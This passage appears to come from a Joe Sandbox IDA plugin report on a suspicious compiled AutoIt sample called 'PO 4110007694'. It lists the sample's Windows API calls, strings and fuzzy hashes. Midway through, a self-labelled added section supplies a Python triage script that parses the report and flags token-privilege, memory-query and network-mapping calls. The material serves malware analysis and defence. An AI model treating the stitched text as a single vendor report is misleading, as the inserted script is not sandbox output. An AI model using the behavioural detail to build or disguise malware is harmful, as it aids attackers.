                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    APIs
                                                                      • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 00C112D8
                                                                    • GetClientRect.USER32(?,?), ref: 00C4B5FB
                                                                    • GetCursorPos.USER32(?), ref: 00C4B605
                                                                    • ScreenToClient.USER32(?,?), ref: 00C4B610
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 4127811313-0
                                                                    APIs
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C6FCED,?,00C70D40,?,00008000), ref: 00C7115F
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00C6FCED,?,00C70D40,?,00008000), ref: 00C71184
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C6FCED,?,00C70D40,?,00008000), ref: 00C7118E
                                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,00C6FCED,?,00C70D40,?,00008000), ref: 00C711C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CounterPerformanceQuerySleep
                                                                    • String ID:
                                                                    • API String ID: 2875609808-0
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00C6D84D
                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C6D864
                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C6D879
                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C6D897
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                    • String ID:
                                                                    • API String ID: 1352324309-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                    • String ID:
                                                                    • API String ID: 3016257755-0
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00C9B2E4
                                                                    • ScreenToClient.USER32(?,?), ref: 00C9B2FC
                                                                    • ScreenToClient.USER32(?,?), ref: 00C9B320
                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C9B33B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                    • String ID:
                                                                    • API String ID: 357397906-0
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C9B644
                                                                    • _memset.LIBCMT ref: 00C9B653
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00CD6F20,00CD6F64), ref: 00C9B682
                                                                    • CloseHandle.KERNEL32 ref: 00C9B694
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                    • String ID:
                                                                    • API String ID: 3277943733-0
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00C76BE6
                                                                      • Part of subcall function 00C776C4: _memset.LIBCMT ref: 00C776F9
                                                                    • _memmove.LIBCMT ref: 00C76C09
                                                                    • _memset.LIBCMT ref: 00C76C16
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00C76C26
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                    • String ID:
                                                                    • API String ID: 48991266-0
                                                                    APIs
                                                                    • GetSysColor.USER32(00000008), ref: 00C12231
                                                                    • SetTextColor.GDI32(?,000000FF), ref: 00C1223B
                                                                    • SetBkMode.GDI32(?,00000001), ref: 00C12250
                                                                    • GetStockObject.GDI32(00000005), ref: 00C12258
                                                                    • GetWindowDC.USER32(?,00000000), ref: 00C4BE83
                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C4BE90
                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 00C4BEA9
                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 00C4BEC2
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00C4BEE2
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00C4BEED
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                    • String ID:
                                                                    • API String ID: 1946975507-0
                                                                    • Opcode ID: 5ef4426c8c6865752711ab4c6c19ca9384c3345b36d7247a0ee591ae7f4bec5f
                                                                    • Instruction ID: 4219de152f88f9e5ac2e82b4b0be446f0854dbc1925e8c7a53b8bb72b30ff01a
                                                                    • Opcode Fuzzy Hash: 5ef4426c8c6865752711ab4c6c19ca9384c3345b36d7247a0ee591ae7f4bec5f
                                                                    • Instruction Fuzzy Hash: 0EE03031104144AADB215F64EC0D7DC3B20EB06332F10836BFA79880E187B14AA1DB51
                                                                    APIs
                                                                    • GetCurrentThread.KERNEL32 ref: 00C6871B
                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C682E6), ref: 00C68722
                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C682E6), ref: 00C6872F
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C682E6), ref: 00C68736
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                    • String ID:
                                                                    • API String ID: 3974789173-0
                                                                    • Opcode ID: 13adfc7f7131261c1fc1dcc6aacdc58425e15816358f2416e94140f389e9358d
                                                                    • Instruction ID: 18ed04cab9b7f8842b1b4b5ad31fd5c3c98c87205ba8ff1d218cd0ba968dd0b3
                                                                    • Opcode Fuzzy Hash: 13adfc7f7131261c1fc1dcc6aacdc58425e15816358f2416e94140f389e9358d
                                                                    • Instruction Fuzzy Hash: 73E086366112119BD7205FB05D4DB5E3BACEF54791F14482DB245C9050DA748456C750
                                                                    APIs
                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 00C6B4BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ContainedObject
                                                                    • String ID: AutoIt3GUI$Container
                                                                    • API String ID: 3565006973-3941886329
                                                                    • Opcode ID: 641004269491dc31b6ef95f3c756d9a34f7e500c964aa5ce03ad8b82f04af14b
                                                                    • Instruction ID: 7f6e1e8b491d76efa16cc335b89bb033105f9cb686ef193977ef4e97ccaeaaec
                                                                    • Opcode Fuzzy Hash: 641004269491dc31b6ef95f3c756d9a34f7e500c964aa5ce03ad8b82f04af14b
                                                                    • Instruction Fuzzy Hash: 37913871600601AFDB24DF64C894BAAB7E9FF49710F20856DF94ACB2A1DB70ED81CB50
                                                                    APIs
                                                                      • Part of subcall function 00C2FC86: _wcscpy.LIBCMT ref: 00C2FCA9
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                    • __wcsnicmp.LIBCMT ref: 00C7B02D
                                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00C7B0F6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                    • String ID: LPT
                                                                    • API String ID: 3222508074-1350329615
                                                                    • Opcode ID: 46c38ace90942f3786e46c5bff38348d872f27a55f716a8b1940c0082d475c9f
                                                                    • Instruction ID: b72ae12764f14357d6795c61cd946fc962ede52bc71589e51b5c30e76bf8b37c
                                                                    • Opcode Fuzzy Hash: 46c38ace90942f3786e46c5bff38348d872f27a55f716a8b1940c0082d475c9f
                                                                    • Instruction Fuzzy Hash: B5617575A00219AFDB14DF54C895FEEB7B4EF09310F108069F91AAB291DB70AF85DB50
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000), ref: 00C22968
                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C22981
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemorySleepStatus
                                                                    • String ID: @
                                                                    • API String ID: 2783356886-2766056989
                                                                    • Opcode ID: b70f8d676d19e060566e16f2e83dc2a3627d8ae0c583869b1e9118f45f1debb2
                                                                    • Instruction ID: 4289524a2a9c9db2335bc3a816e0b08ba630470602989ed5ecc5f60e4fb9d3a1
                                                                    • Opcode Fuzzy Hash: b70f8d676d19e060566e16f2e83dc2a3627d8ae0c583869b1e9118f45f1debb2
                                                                    • Instruction Fuzzy Hash: C9513871418744ABE720EF10D886BEFBBE8FF86344F41885DF2D8411A1DB318569EB66
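Added example, not part of the Joe Sandbox report and not code from the sample: a small Python triage script that parses function blocks written in the format of this table and applies a watchlist of my own choosing to three of the blocks above (OpenThreadToken followed by OpenProcessToken; GlobalMemoryStatusEx; WNetUseConnectionW with the string LPT). It reads the "APIs", "ref:", "API ID", "String ID" and "Instruction Fuzzy Hash" lines and keeps "Part of subcall function" entries separate from the function's own calls. The sample input is copied from those blocks, trimmed to the lines the parser consumes. One interpretation it relies on: GetCurrentProcess takes no parameters, so the 00000028 printed in its first argument slot is the stack value already pushed for the following OpenProcessToken call, i.e. its DesiredAccess, and 0x28 decodes to TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, the access an AdjustTokenPrivileges prologue needs. Caveat: these routines are part of the AutoIt3 interpreter the script is wrapped in (the report flags the binary as a compiled AutoIt script), so their presence alone does not distinguish this sample from any other compiled AutoIt binary; the watchlist is a triage aid, not a verdict.

```python
# Added example (not Joe Sandbox code): parse "APIs" function blocks in the report's
# format and apply a small API watchlist of the author's own choosing.
import re

# Constructed input: three blocks copied from the report above, trimmed to the lines
# this parser consumes ("Download File" link residue omitted).
SAMPLE = """\
APIs
• GetCurrentThread.KERNEL32 ref: 00C6871B
• OpenThreadToken.ADVAPI32(00000000,?,?,?,00C682E6), ref: 00C68722
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C682E6), ref: 00C6872F
• OpenProcessToken.ADVAPI32(00000000,?,?,?,00C682E6), ref: 00C68736
• API ID: CurrentOpenProcessThreadToken
• String ID:
• Instruction Fuzzy Hash: 73E086366112119BD7205FB05D4DB5E3BACEF54791F14482DB245C9050DA748456C750
APIs
• Sleep.KERNEL32(00000000), ref: 00C22968
• GlobalMemoryStatusEx.KERNEL32(?), ref: 00C22981
• API ID: GlobalMemorySleepStatus
• String ID: @
• Instruction Fuzzy Hash: C9513871418744ABE720EF10D886BEFBBE8FF86344F41885DF2D8411A1DB318569EB66
APIs
  • Part of subcall function 00C2FC86: _wcscpy.LIBCMT ref: 00C2FCA9
• __wcsnicmp.LIBCMT ref: 00C7B02D
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00C7B0F6
• API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
• String ID: LPT
• Instruction Fuzzy Hash: B5617575A00219AFDB14DF54C895FEEB7B4EF09310F108069F91AAB291DB70AF85DB50
"""

# One call line: optional "Part of subcall function <addr>:" prefix, Name.MODULE, optional
# "(stack slots)", then "ref: <call-site address>".
CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w@$?]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
META_RE = re.compile(r"^•\s*(API ID|String ID|Instruction Fuzzy Hash):\s*(.*)$")
META_KEYS = {"API ID": "api_id", "String ID": "string_id", "Instruction Fuzzy Hash": "fuzzy_hash"}

# Token access-mask bits from winnt.h; 0x28 is TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES.
TOKEN_ACCESS = {
    0x01: "TOKEN_ASSIGN_PRIMARY", 0x02: "TOKEN_DUPLICATE", 0x04: "TOKEN_IMPERSONATE",
    0x08: "TOKEN_QUERY", 0x10: "TOKEN_QUERY_SOURCE", 0x20: "TOKEN_ADJUST_PRIVILEGES",
    0x40: "TOKEN_ADJUST_GROUPS", 0x80: "TOKEN_ADJUST_DEFAULT", 0x100: "TOKEN_ADJUST_SESSIONID",
}


def parse_blocks(text):
    """Return one dict per "APIs" block: calls (list of dicts), api_id, string_id, fuzzy_hash."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                       # every "APIs" header opens a new block
            cur = {"calls": [], "api_id": "", "string_id": "", "fuzzy_hash": ""}
            blocks.append(cur)
        elif cur is None:
            continue
        elif (m := META_RE.match(line)):
            cur[META_KEYS[m[1]]] = m[2]
        elif (m := CALL_RE.match(line)):
            cur["calls"].append({
                "name": m["name"], "module": m["module"], "ref": m["ref"],
                "args": [a for a in (m["args"] or "").split(",") if a],  # "?" = unknown slot
                "sub": m["sub"],                 # set for "Part of subcall function" entries
            })
    return blocks


def direct(block, name):
    """Calls made by the function itself, excluding those attributed to a callee."""
    return [c for c in block["calls"] if c["name"] == name and c["sub"] is None]


def decode_token_access(mask):
    return [name for bit, name in sorted(TOKEN_ACCESS.items()) if mask & bit]


def triage(block):
    """Watchlist notes for one block; the rules are the author's, not Joe Sandbox signatures."""
    notes = []
    if direct(block, "OpenThreadToken") and direct(block, "OpenProcessToken"):
        # GetCurrentProcess takes no parameters, so the value the plugin prints in its
        # first slot is the DesiredAccess already pushed for the OpenProcessToken call.
        gcp = direct(block, "GetCurrentProcess")
        slot = gcp[0]["args"][0] if gcp and gcp[0]["args"] else ""
        access = "|".join(decode_token_access(int(slot, 16))) if re.fullmatch(r"[0-9A-F]+", slot) else "unknown"
        notes.append("opens thread token then process token, access " + access)
    if direct(block, "GlobalMemoryStatusEx"):
        notes.append("queries physical/virtual memory size")
    if direct(block, "WNetUseConnectionW"):
        notes.append("maps a network resource (string %r)" % block["string_id"])
    return notes


if __name__ == "__main__":
    for b in parse_blocks(SAMPLE):
        print(b["api_id"], b["fuzzy_hash"][:16], triage(b))
```

Run against the full report text instead of SAMPLE to get one line per function; the Instruction Fuzzy Hash is the field to pivot on when comparing this AutoIt runtime against other compiled AutoIt samples, since the API lists are identical across builds of the same interpreter version.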
                                                                    APIs
                                                                      • Part of subcall function 00C14F0B: __fread_nolock.LIBCMT ref: 00C14F29
                                                                    • _wcscmp.LIBCMT ref: 00C79824
                                                                    • _wcscmp.LIBCMT ref: 00C79837
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscmp$__fread_nolock
                                                                    • String ID: FILE
                                                                    • API String ID: 4029003684-3121273764
                                                                    • Opcode ID: 73cf2b7483399f3475f87cfcfcc9e5f27723fa6f963cfb544ed5f799b376de92
                                                                    • Instruction ID: ee42e2c5a5ada3079313e3f181c15bf59ae02fa2664262f456c3c2600f44b806
                                                                    • Opcode Fuzzy Hash: 73cf2b7483399f3475f87cfcfcc9e5f27723fa6f963cfb544ed5f799b376de92
                                                                    • Instruction Fuzzy Hash: D741D571A00209BBDF249EE4CC45FEFBBBDDF86710F004069F904A7280DA719A45AB61
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C8259E
                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C825D4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CrackInternet_memset
                                                                    • String ID: |
                                                                    • API String ID: 1413715105-2343686810
                                                                    • Opcode ID: c3849abe75f26f8e3e0fe4856ae882497b88d6234f91426be78adfca4e5f4d6c
                                                                    • Instruction ID: ce195630bed5bcbaa2c55efd8bce3c0b9dfae4a9c895e2a5db34172ee6536857
                                                                    • Opcode Fuzzy Hash: c3849abe75f26f8e3e0fe4856ae882497b88d6234f91426be78adfca4e5f4d6c
                                                                    • Instruction Fuzzy Hash: 7A311D71800119EBCF11EFA1CC89EEEBFB8FF09314F100159F915A6161EB315996EB90
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00C97B61
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C97B76
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: '
                                                                    • API String ID: 3850602802-1997036262
                                                                    • Opcode ID: 346d294867a88a0f38c288de21a4193ab69b01987e7d6a5e979b07cf516347f9
                                                                    • Instruction ID: db2ff18d14d35aeb17a1309800ef99cd5f32fb4f43c4731de764f9f52fc25875
                                                                    • Opcode Fuzzy Hash: 346d294867a88a0f38c288de21a4193ab69b01987e7d6a5e979b07cf516347f9
                                                                    • Instruction Fuzzy Hash: E2411774A062099FDF14CF65C985BEEBBB5FB08300F10026AE904AB381D730AA51DF90
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00C96B17
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C96B53
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
